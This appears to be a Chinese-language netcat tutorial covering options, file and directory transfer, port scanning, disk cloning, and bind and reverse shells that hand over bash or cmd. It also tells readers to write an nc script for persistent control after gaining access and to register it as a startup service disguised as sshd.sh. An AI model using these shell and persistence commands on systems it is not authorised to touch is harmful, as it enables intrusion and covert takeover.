基本工具NETCAT—NC
nc的基础命令,nc命令详解
-g<网关>:设置路由器跃程通信网关,最多设置8个;
-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助;
-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
-l:使用监听模式,监控传入的资料;
-n:直接使用ip地址,而不通过域名服务器;
-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p<通信端口>:设置本地主机使用的通信端口;
-r:指定源端口和目的端口都进行随机的选择;
-s<来源位址>:设置本地主机送出数据包的IP地址;
-u:使用UDP传输协议;
-v:显示指令执行过程;
-w<超时秒数>:设置等待连线的时间;
-z:使用0输入/输出模式,只在扫描通信端口时使用。
1.能连接服务器的端口
nc-nv 1.1.1.1 25
传输信息
nc -l -p 4444(服务器)
nc -nv 1.1.1.1 4444(客户端)
传输文件(视频,图片等)
nc -l -p 333 > 需要保存的文件的重命名
nc -nv 1.1.1.1 333 > 需要传输的文件
反向传递,在服务器端,同样可以操作,一旦有人访问这个端口就会传输这个文件
nc -lp 333 < 需要传的文件 -q 1
传输目录
tar - cvf - 目录 | nc -lp 333 -q 1//将目录打包,放到333端口,等待别人访问
nc -nv 1.1.1.1 333 | tar -xvf - //访问目标端口,并解压
文本加密传输
mcrypt --flush -Fbq -a rijndael -256 -m ecb < a.mp4 |nc -nv 1.1.1.1 333 -q 1//加密文件,并发送
nc -lp 333 | mcrypt --flush -Fbqd -a rijndael -256 -m ecb > 1.mp4//接受文件并解密
流媒体服务
cat 1.mp4 |nc -lp 333//接收,并观看
nc -nv 1.1.1.1 333 |mplayer(一个支持流媒体的播放器) -vo xll -cache 3000 -//发送视频
NC——端口扫描
nc -nvz 1.1.1.1 1-65535//扫描1-65535端口
nc -vnzu 1.1.1.1 -1024
NC——远程克隆硬盘
nc -lp 333 | dd of =/dev/sda
dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程电子取证,可以将目标服务器硬盘远程复制,或者内存。
NC——远程控制
正向:
nc -lp 333 -c bash//被控制的服务器
nc 1.1.1.1 333
反向:
nc -lp 333
nc 1.1.1.1 333 -c bash//被控制的服务器
注:Windows用户把bash改成cmd
我们可以在获取权限的时候,编写一个脚本利用nc来持久控制对方电脑
【Linux】利用 update-rc.d命令 添加开机启动服务
方法一:
当我们需要开机启动自己的脚本时,只需要将可执行脚本丢在/etc/init.d目录下,然后在/etc/rc.d/rc*.d中建立软链接即可
给脚本权限:chmod 755 /etc/init.d/sshd.sh
建立软链接: ln -s /etc/init.d/sshd.sh /etc/rc.d/rc3.d/S100sshd.sh
方法二:
1. 复制或软连接脚本到/etc/init.d/目录下
2. 将脚本添加到初始化执行的队列中去//注意如果脚本需要用到网络,则NN需设置一个比较大的数字,如99。
命令:update-rc.d xxx defaults NN命令 //(NN为启动顺序)
** 设置脚本文件的权限**
$ sudo chmod 755 /etc/init.d/svnd.sh (注意一定要设置权限,不然开机不会启动)
执行如下命令将脚本放到启动脚本中去:
$ cd /etc/init.d
$ sudo update-rc.d svnd.sh defaults 95//其中数字95是脚本启动的顺序号,按照自己的需要相应修改即可。在你有多个启动脚本,而它们之间又有先后启动的依赖关系时你就知道这个数字的具体作用了。
** 卸载启动脚本的方法:**
$ cd /etc/init.d
$ sudo update-rc.d -f svnd.sh remove
NC——NCAT
-
Nc缺乏加密和身份验证的能力
-
Ncat包含于nmap工具包中
ncat ncat -c bash -allow 1.1.1.1 -vnl 333 -ssl
ncat -nv 1.1.1.1 333 -ssl
不同系统/平台的nc参数功能不尽相同